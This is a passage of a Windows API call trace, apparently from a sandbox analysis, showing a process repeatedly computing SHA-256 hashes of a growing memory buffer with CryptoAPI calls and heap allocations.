	[0199.668] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0199.668] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.668] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26917a8
	[0199.668] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26917a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26917a8, pdwDataLen=0x1283b0) returned 1
	[0199.668] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.668] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.668] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.668] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.668] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0199.668] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.668] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26917d0
	[0199.668] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26917d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26917d0, pdwDataLen=0x1283b0) returned 1
	[0199.669] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.669] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.669] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.669] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.669] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0199.669] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.669] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26917f8
	[0199.669] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26917f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26917f8, pdwDataLen=0x1283b0) returned 1
	[0199.669] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.669] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.669] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.669] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.669] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0199.670] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.670] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691820
	[0199.670] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691820, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691820, pdwDataLen=0x1283b0) returned 1
	[0199.670] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.670] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.670] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.670] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.670] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0199.670] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.670] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691848
	[0199.670] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691848, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691848, pdwDataLen=0x1283b0) returned 1
	[0199.670] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.670] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.670] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.670] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.670] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0199.671] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691870
	[0199.671] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691870, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691870, pdwDataLen=0x1283b0) returned 1
	[0199.671] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.671] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.671] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.671] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.671] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0199.671] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691898
	[0199.671] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691898, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691898, pdwDataLen=0x1283b0) returned 1
	[0199.671] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.671] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.671] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.671] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.672] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0199.672] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26918c0
	[0199.672] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26918c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26918c0, pdwDataLen=0x1283b0) returned 1
	[0199.672] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.672] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.672] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.672] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.672] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0199.672] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26918e8
	[0199.672] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26918e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26918e8, pdwDataLen=0x1283b0) returned 1
	[0199.672] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.672] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.672] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.673] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.673] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0199.673] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691910
	[0199.673] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691910, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691910, pdwDataLen=0x1283b0) returned 1
	[0199.673] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.673] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.673] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.673] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.673] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0199.673] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691938
	[0199.673] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691938, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691938, pdwDataLen=0x1283b0) returned 1
	[0199.673] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.673] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.673] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.674] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.674] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0199.674] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691960
	[0199.674] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691960, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691960, pdwDataLen=0x1283b0) returned 1
	[0199.674] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.674] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.674] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.674] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.674] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0199.674] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691988
	[0199.674] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691988, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691988, pdwDataLen=0x1283b0) returned 1
	[0199.674] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.674] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.674] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.675] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.675] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0199.675] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.675] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26919b0
	[0199.675] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26919b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26919b0, pdwDataLen=0x1283b0) returned 1
	[0199.675] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.675] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.675] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.675] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.675] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0199.675] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.675] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26919d8
	[0199.675] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26919d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26919d8, pdwDataLen=0x1283b0) returned 1
	[0199.675] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.675] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.675] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.676] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.676] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0199.676] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.676] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691a00
	[0199.676] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691a00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691a00, pdwDataLen=0x1283b0) returned 1
	[0199.676] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.676] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.676] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.676] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.676] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0199.676] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.676] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691a28
	[0199.676] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691a28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691a28, pdwDataLen=0x1283b0) returned 1
	[0199.676] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.676] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.676] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.677] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.677] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0199.677] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691a50
	[0199.677] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691a50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691a50, pdwDataLen=0x1283b0) returned 1
	[0199.677] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.677] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.677] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.677] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.677] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0199.677] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691a78
	[0199.677] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691a78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691a78, pdwDataLen=0x1283b0) returned 1
	[0199.677] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.677] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.677] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2756bf0) returned 1
	[0199.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2756bf0
	[0199.677] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.678] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.678] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0199.678] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691aa0
	[0199.678] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691aa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691aa0, pdwDataLen=0x1283b0) returned 1
	[0199.678] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.678] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.678] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.678] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.678] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0199.678] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691ac8
	[0199.678] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691ac8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691ac8, pdwDataLen=0x1283b0) returned 1
	[0199.678] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.678] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.678] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.679] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.679] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0199.679] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691af0
	[0199.679] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691af0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691af0, pdwDataLen=0x1283b0) returned 1
	[0199.679] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.679] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.679] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.679] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.679] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0199.679] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691b18
	[0199.679] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691b18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691b18, pdwDataLen=0x1283b0) returned 1
	[0199.679] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.679] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.679] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.680] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.680] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0199.680] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.680] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691b40
	[0199.680] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2691b40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691b40, pdwDataLen=0x1283b0) returned 1
	[0199.680] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.680] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.680] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.680] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.680] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0199.680] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.680] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2691b68
	[0199.680] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2691b68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2691b68, pdwDataLen=0x1283b0) returned 1
	[0199.680] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.680] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.680] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
